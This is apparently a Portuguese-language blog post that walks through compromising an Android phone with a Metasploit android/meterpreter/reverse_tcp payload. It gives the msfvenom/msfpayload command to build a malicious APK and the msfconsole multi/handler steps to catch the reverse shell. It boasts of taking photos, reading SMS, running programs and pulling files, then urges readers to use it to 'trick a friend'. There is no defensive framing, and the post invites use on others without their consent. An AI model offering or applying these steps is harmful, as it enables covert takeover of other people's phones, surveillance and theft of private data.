Metasploit: invadindo sistema Android ( reverse_tcp ) com [Msfvenon]/[Msfpayload]
Ae galera, hoje eu fiz minha primeira invasao no Android utilizando o Metasploit.
Foi simples, primeiro criei um payload usando o modulo meterpreter/reverse_tcp.
apos isto eu mandei o payload para vitima no caso meu celular.
apos isto eu iniciei o exploit.
exploit/multi/handler
setei o payload que usei ( android/meterpreter/reverse_tcp )
configurei a porta e o IP local, e dei um exploit, apos isto foi so a vitima abrir o payload, e BOMBA, a sessao abriu utilizando o meterpreter.
Com ele ativo, consegui tirar fotos, capturar fotos, SMS, execuçao de programas, baixar arquivos.
Fantastico, voce que quer engana um amigo seu segue a dica ;)
comandos que eu uitlizei:
msfvenon or msfpayload -p android/meterpreter/reverse_tcp LHOST=seuip LPORT=4444(DEFAULT) R > nome do aquivo.apk
ele vai estar no diretorio principal, de um "ls".
apos isto mande o payload para vitima.
abra o MSFCONSOLE.
comandos:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
agora configure sua LHOST dnv
set LHOST seuip
apos isto de um "exploit"
Quando a vitima abrir seu payload ira abrir a sessao e ae voce da um help, e agora so brincar com seu amigo >:D
fotos:
Nenhum comentário:
Postar um comentário